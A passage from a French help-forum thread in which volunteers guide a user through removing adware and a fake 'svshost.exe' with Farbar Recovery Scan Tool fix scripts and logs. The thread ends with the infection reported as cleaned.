HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0BCA31F5-C84C-4EFB-853D-D8D4BF1A12D0} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\Stitught Adapter => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Stitught Adapter => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2FEF85B9-43EB-4464-A330-0BDBA8F96A7D} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2FEF85B9-43EB-4464-A330-0BDBA8F96A7D} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\PPI Update => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PPI Update => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{85D459E1-3408-4818-9A8A-113F4A7C39E4} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{85D459E1-3408-4818-9A8A-113F4A7C39E4} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\4748n28b39k4621 => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\4748n28b39k4621 => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9221C68B-37BD-4AAC-AC97-7FB76F3289C0} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9221C68B-37BD-4AAC-AC97-7FB76F3289C0} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\Gruzitain => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Gruzitain => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{F8CC5AC7-4C52-41E8-8FFE-6339EEF96579} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F8CC5AC7-4C52-41E8-8FFE-6339EEF96579} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\RunBoosterUpdateTask => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RunBoosterUpdateTask => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FC960594-E2B1-4210-973B-7C2F374B4D13} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FC960594-E2B1-4210-973B-7C2F374B4D13} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\[email protected]\Windows63Professional => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\[email protected]\Windows63Professional => clé supprimé(es) avec succès
C:\Users\DELL\Desktop\Google Chrome.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\DELL\Desktop\Internet Explorer.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\DELL\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Internet Explorer.LNK => Raccourci argument supprimé(es) avec succès.
C:\Windows\[email protected] => déplacé(es) avec succès
C:\Users\Public\Desktop\[email protected] => déplacé(es) avec succès
C:\Windows\System32\Tasks\[email protected] => déplacé(es) avec succès
C:\Users\DELL\AppData\Local\mpress => déplacé(es) avec succès
C:\Windows\system32\Drivers\WinDivert64.sys => déplacé(es) avec succès
"C:\Windows\System32\Tasks\4748n28b39k4621" => non trouvé(e).
"C:\Windows\System32\Tasks\RunBoosterUpdateTask" => non trouvé(e).
C:\ProgramData\4748n28b39k4621 => déplacé(es) avec succès
C:\Program Files\RunBooster => déplacé(es) avec succès
C:\Users\DELL\AppData\Roaming\Installer.dat => déplacé(es) avec succès
C:\Users\DELL\AppData\Roaming\InstallationConfiguration.xml => déplacé(es) avec succès
C:\Program Files (x86)\Grtase => déplacé(es) avec succès
"C:\Windows\System32\Tasks\Stitught Adapter" => non trouvé(e).
C:\Users\DELL\AppData\Roaming\Shjuch => déplacé(es) avec succès
C:\Users\DELL\AppData\Local\Lzedom => déplacé(es) avec succès
C:\Program Files (x86)\Stitught Adapter => déplacé(es) avec succès
"C:\Windows\System32\Tasks\Gruzitain" => non trouvé(e).
C:\Program Files (x86)\Microsoft Toolkit Final => déplacé(es) avec succès
"C:\Windows\System32\Tasks\PPI Update" => non trouvé(e).
"C:\Program Files (x86)\Grtase" => non trouvé(e).
"C:\ProgramData\4748n28b39k4621" => non trouvé(e).
Impossible de déplacer "D:\$.RECYCLEBIN\svshost.exe" => Planifié pour déplacement au redémarrage.
=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 29581391 B
Java, Flash, Steam htmlcache => 492 B
Windows/system/drivers => 444966140 B
Edge => 0 B
Chrome => 539570400 B
Firefox => 0 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 127673 B
NetworkService => 13802 B
DELL => 1621522160 B
RecycleBin => 2974543901 B
EmptyTemp: => 5.2 GB données temporaires supprimées.
================================
Résultats du déplacement planifié des fichiers (Mode d'amorçage: Normal) (Date&Heure: 26-03-2017 22:13:09)
D:\$.RECYCLEBIN\svshost.exe => déplacé(es) avec succès
D:\$.RECYCLEBIN\svshost.exe => a été déplacé(e) avec succès
D:\$.RECYCLEBIN\svshost.exe => a été déplacé(e) avec succès
==== Fin de Fixlog 22:13:10 ====
- Messages : 31840
- Inscription : 28 févr. 2008 13:58
- Localisation : Breizhilienne
Re: erreur cannot find script file D:\$RECYCLEBIN\Adobe.rar
Tu refais 2 nouveaux rapports ftst.txt et addition.txt
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
https://helicium.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Un p'tit Don à Angélique Merci.
https://helicium.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Un p'tit Don à Angélique
Merci.Re: erreur cannot find script file D:\$RECYCLEBIN\Adobe.rar
Bonjour,
j`ai fait les deux rapports de scan FRST et Addition, comme tu l`a demande et voilà les les liens générés par le site pjjoint.malekal.com
FRST
http://pjjoint.malekal.com/files.php?id ... 4i7c5o10g6
Addition
http://pjjoint.malekal.com/files.php?id ... n5e15w9d14
Merci pour votre aide.
j`ai fait les deux rapports de scan FRST et Addition, comme tu l`a demande et voilà les les liens générés par le site pjjoint.malekal.com
FRST
http://pjjoint.malekal.com/files.php?id ... 4i7c5o10g6
Addition
http://pjjoint.malekal.com/files.php?id ... n5e15w9d14
Merci pour votre aide.
- Messages : 113148
- Inscription : 10 sept. 2005 13:57
Re: erreur cannot find script file D:\$RECYCLEBIN\Adobe.rar
Désinstalle, ces deux programmes, sont inutiles :
Pour te protéger des infections amovibles type Wscript (Windows Script Host)
Clic sur Désactiver au niveau de Windows Script Host.
Marmiton va bloquer les scripts malicieux (VBS, VBE, JavaScript etc) notamment qui sont utilisés pour propager des ransomwares comme Locky.
2/
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
1/AVG Web TuneUp
DriverPack Notifier
Pour te protéger des infections amovibles type Wscript (Windows Script Host)
- Télécharger-Marmiton
- Marmiton
Marmiton va bloquer les scripts malicieux (VBS, VBE, JavaScript etc) notamment qui sont utilisés pour propager des ransomwares comme Locky.
2/
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Code : Tout sélectionner
CreateRestorePoint:
CloseProcesses:
Task: {12FC7D88-EBB3-4CCA-BFB4-2A4EFEFE219F} - System32\Tasks\DriverPack Notifier => C:\Program Files (x86)\DriverPack Notifier\DriverPackNotifier.exe [2015-12-18] ()
C:\Program Files (x86)\DriverPack Notifier
Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Claire.lnk [2017-03-26]
Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cleaner.lnk [2017-03-26]
Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Help.lnk [2017-03-26]
C:\$.RECYCLEBIN\svshost.exe
Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Manual.lnk [2017-03-26]
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
➔ Comment protéger son PC des virus
➔ Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11
Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
➔ Comment protéger son PC des virus
➔ Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11
Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Re: erreur cannot find script file D:\$RECYCLEBIN\Adobe.rar
je vous remercie, vraiment,
voila le rapport fixlog.txt
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 15-03-2017
Exécuté par DELL (29-03-2017 13:10:51) Run:2
Exécuté depuis C:\Users\DELL\Desktop
Profils chargés: DELL (Profils disponibles: DELL)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
Task: {12FC7D88-EBB3-4CCA-BFB4-2A4EFEFE219F} - System32\Tasks\DriverPack Notifier => C:\Program Files (x86)\DriverPack Notifier\DriverPackNotifier.exe [2015-12-18] ()
C:\Program Files (x86)\DriverPack Notifier
Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Claire.lnk [2017-03-26]
Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cleaner.lnk [2017-03-26]
Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Help.lnk [2017-03-26]
C:\$.RECYCLEBIN\svshost.exe
Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Manual.lnk [2017-03-26]
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
*****************
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{12FC7D88-EBB3-4CCA-BFB4-2A4EFEFE219F} => clé non trouvé(e).
C:\Windows\System32\Tasks\DriverPack Notifier => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DriverPack Notifier => clé non trouvé(e).
C:\Program Files (x86)\DriverPack Notifier => déplacé(es) avec succès
C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Claire.lnk => déplacé(es) avec succès
C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cleaner.lnk => déplacé(es) avec succès
C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Help.lnk => déplacé(es) avec succès
C:\$.RECYCLEBIN\svshost.exe => déplacé(es) avec succès
C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Manual.lnk => déplacé(es) avec succès
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-325761367-1696366621-651979147-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-325761367-1696366621-651979147-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 10546202 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 68 B
Edge => 0 B
Chrome => 642735 B
Firefox => 0 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 128 B
LocalService => 1598 B
NetworkService => 0 B
DELL => 11021479 B
RecycleBin => 0 B
EmptyTemp: => 29.2 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
==== Fin de Fixlog 13:11:31 ====
voila le rapport fixlog.txt
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 15-03-2017
Exécuté par DELL (29-03-2017 13:10:51) Run:2
Exécuté depuis C:\Users\DELL\Desktop
Profils chargés: DELL (Profils disponibles: DELL)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
Task: {12FC7D88-EBB3-4CCA-BFB4-2A4EFEFE219F} - System32\Tasks\DriverPack Notifier => C:\Program Files (x86)\DriverPack Notifier\DriverPackNotifier.exe [2015-12-18] ()
C:\Program Files (x86)\DriverPack Notifier
Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Claire.lnk [2017-03-26]
Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cleaner.lnk [2017-03-26]
Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Help.lnk [2017-03-26]
C:\$.RECYCLEBIN\svshost.exe
Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Manual.lnk [2017-03-26]
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
*****************
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{12FC7D88-EBB3-4CCA-BFB4-2A4EFEFE219F} => clé non trouvé(e).
C:\Windows\System32\Tasks\DriverPack Notifier => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DriverPack Notifier => clé non trouvé(e).
C:\Program Files (x86)\DriverPack Notifier => déplacé(es) avec succès
C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Claire.lnk => déplacé(es) avec succès
C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cleaner.lnk => déplacé(es) avec succès
C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Help.lnk => déplacé(es) avec succès
C:\$.RECYCLEBIN\svshost.exe => déplacé(es) avec succès
C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Manual.lnk => déplacé(es) avec succès
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-325761367-1696366621-651979147-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-325761367-1696366621-651979147-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 10546202 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 68 B
Edge => 0 B
Chrome => 642735 B
Firefox => 0 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 128 B
LocalService => 1598 B
NetworkService => 0 B
DELL => 11021479 B
RecycleBin => 0 B
EmptyTemp: => 29.2 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
==== Fin de Fixlog 13:11:31 ====
- Messages : 31840
- Inscription : 28 févr. 2008 13:58
- Localisation : Breizhilienne
Re: erreur cannot find script file D:\$RECYCLEBIN\Adobe.rar
ça doit être OK je pense ?
Si oui tu pourras supprimer frst, ses rapports et C:\FRST
Si oui tu pourras supprimer frst, ses rapports et C:\FRST
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
https://helicium.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Un p'tit Don à Angélique Merci.
https://helicium.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Un p'tit Don à Angélique
Merci.Re: erreur cannot find script file D:\$RECYCLEBIN\Adobe.rar
c OK merci pour votre aide et bon courage.
- Messages : 113148
- Inscription : 10 sept. 2005 13:57
Re: erreur cannot find script file D:\$RECYCLEBIN\Adobe.rar
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
➔ Comment protéger son PC des virus
➔ Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11
Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
➔ Comment protéger son PC des virus
➔ Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11
Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
-
- Sujets similaires
- Réponses
- Vues
- Dernier message
-
- 3 Réponses
- 54 Vues
-
Dernier message par Malekal_morte
-
- 6 Réponses
- 375 Vues
-
Dernier message par Shinisen
-
- 1 Réponses
- 284 Vues
-
Dernier message par Malekal_morte
-
- 7 Réponses
- 282 Vues
-
Dernier message par Parisien_entraide
-
- 1 Réponses
- 155 Vues
-
Dernier message par Malekal_morte